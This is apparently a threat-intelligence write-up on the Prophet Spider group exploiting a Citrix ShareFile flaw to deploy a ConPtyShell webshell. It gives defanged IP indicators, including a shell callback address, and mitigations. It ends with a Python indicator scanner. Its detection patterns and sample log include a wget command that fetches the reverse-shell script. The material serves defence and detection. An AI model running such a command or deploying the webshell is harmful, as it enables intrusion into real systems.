Prophet Spider Exploits Citrix ShareFile to Deploy Webshell
The adversary group nicknamed Prophet Spider by CrowdStrike has chosen a new vulnerability to include in its exploitation tool kit. This group has been observed leveraging CVE-2021-22941 to deploy an open-source webshell pulled from GitHub. In the past, compromises conducted by Prophet Spider have resulted in ransomware outbreaks. Additionally, adversary objectives frequently include obtaining valid credentials. It is believed that the group has operated, or currently operates, as an access broker, selling access to compromised systems for a price, perhaps even for a portion of the ransomware payment.
Recent activity from this group reused resources seen in earlier attacks (at least the WebLogic and Log4j campaigns). This suggests that while the group's capabilities are mature, it reuses infrastructure to some extent, which gives blue team defenders an opportunity to disrupt future attacks.
Who
Prophet Spider, like other Spider groups, is an eCriminal adversary group. Campaigns from this group have been observed as early as May 2017. This group focuses on compromising external and vulnerable web services. They are well known to abuse known public vulnerabilities, particularly those with an existing Proof-of-Concept. They have been observed exploiting recent and old vulnerabilities and have used SQL injection attacks. Their targets include Linux and Windows systems.
Unlike other adversary groups, this group does not appear to leverage other typical tactics such as password spraying, phishing, trojans/malvertising, or drive-by downloads (Dark Reading, Prophet Spider Exploits WebLogic CVEs to Enable Ransomware Attacks).
What
The most recently observed campaigns included attempts to exploit Citrix ShareFile (CVE-2021-22941). Organizations can remediate this vulnerability by updating their Citrix ShareFile storage zone controller to 5.11.20 or later.
Detections for this activity have also been developed by Emir Erdogan and are available on SOC Prime.
While this group has used many exploits in the past, some recent ones still in use include CVE-2020-14750, CVE-2020-14882, CVE-2021-26084, and CVE-2021-22941.
Why
This group does not seem to maintain its own ransomware, nor is it an affiliate of another Ransomware-as-a-Service (RaaS) operation as far as we can tell. However, compromises by this group have led to ransomware attacks in the past; Egregor and MountLocker are two ransomware families that have followed compromises by this group.
Tactical Intelligence
Tools, Tactics, and Techniques
1. Open Source WebShell: https[:]//raw.githubusercontent[.]com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1
2. Wget
3. Winn.exe
4. GOTROJ remote access trojan
MITRE ATT&CK
Initial Access
T1190: Exploit Public Facing Application
Execution
T1059.001: Command and Scripting Interpreter: PowerShell
Persistence
T1505.003: Server Software Component: Web Shell
Command and Control
T1071: Application Layer Protocol
T1105: Ingress Tool Transfer
Observed Tactics noted by Crowdstrike research.
Indicators of Attack:
188.119.149[.]160 [attacking exploit]
Indicators of Compromise:
45.61.136[.]39:443 [file hosting]
107.181.187[.]184:4242 [shell callback]
Invoke-ConPtyShell.ps1 from https[:]//raw.githubusercontent[.]com/antonioCoco/ConPtyShell
Possible Mitigation Steps to Consider:
- Consider reviewing for activity from the provided IP addresses (note that these IPs were used in campaigns prior to the observed ShareFile exploitation, so historical connections could be related to other adversaries)
- Consider monitoring for wget commands pulling files from githubusercontent
- Ensure patches for CVE-2020-14750, CVE-2020-14882, CVE-2021-26084, and CVE-2021-22941 are applied.
- The adversary used a burpcollaborator[.]net token. This is a part of Burp Suite and, while not malicious, may be unexpected in your environment, which may provide additional detection/disruption opportunities.
- The adversary will continue to evolve its list of used exploits; quick patching reduces the future risk of compromise from this adversary and groups like it.
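As an added example (not part of the original post and not a tool from any of the cited vendors), a small Python scanner that applies the indicators listed above to log lines; the log format, field names and sample lines are constructed assumptions.

```python
import re

# Indicators taken from the post above (undefanged so they match real log data).
IOC_IPS = {"188.119.149.160", "45.61.136.39", "107.181.187.184"}
IOC_PATTERNS = [
    ("webshell-download", re.compile(r"\bwget\b.*raw\.githubusercontent\.com", re.I)),
    ("conptyshell",       re.compile(r"Invoke-ConPtyShell\.ps1", re.I)),
    ("burp-collaborator", re.compile(r"burpcollaborator\.net", re.I)),
]
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def scan_line(line):
    """Return the names of every indicator matched by one log line."""
    hits = [name for name, pat in IOC_PATTERNS if pat.search(line)]
    for ip in IP_RE.findall(line):
        if ip in IOC_IPS:
            hits.append("ioc-ip:" + ip)
    return hits


def scan_log(lines):
    """Yield (line_number, line, hits) for lines matching at least one indicator."""
    for n, line in enumerate(lines, 1):
        hits = scan_line(line)
        if hits:
            yield n, line.strip(), hits


# Constructed sample log; the last line is benign and should not match.
SAMPLE_LOG = """\
2022-01-10T10:01:02Z proxy src=10.0.0.5 dst=45.61.136.39:443 method=CONNECT
2022-01-10T10:01:05Z sysmon CommandLine="wget https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1"
2022-01-10T10:01:09Z dns query=abcd1234.burpcollaborator.net src=10.0.0.5
2022-01-10T10:01:15Z fw allow src=10.0.0.5 dst=107.181.187.184:4242 proto=tcp
2022-01-10T10:02:00Z proxy src=10.0.0.7 dst=203.0.113.10:443 method=CONNECT
"""

if __name__ == "__main__":
    for n, line, hits in scan_log(SAMPLE_LOG.splitlines()):
        print(n, hits, line)
```

Historical hits on the IP indicators should be triaged with the caveat above in mind, since the same infrastructure appeared in earlier campaigns.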
Contributors
Special thanks to Mike Manrod and Jorge Trevino for contributions, collaboration, and editing.
References and Additional Resources
Prophet Spider Exploits WebLogic CVEs to Enable Ransomware Attacks
PROPHET SPIDER Exploits Oracle WebLogic to Facilitate Ransomware Activity
Log4J: BlackBerry finds Prophet Spider access broker exploiting VMware Horizon
IAB Prophet Spider Seizes Opportunity to Exploit Log4j Vulnerability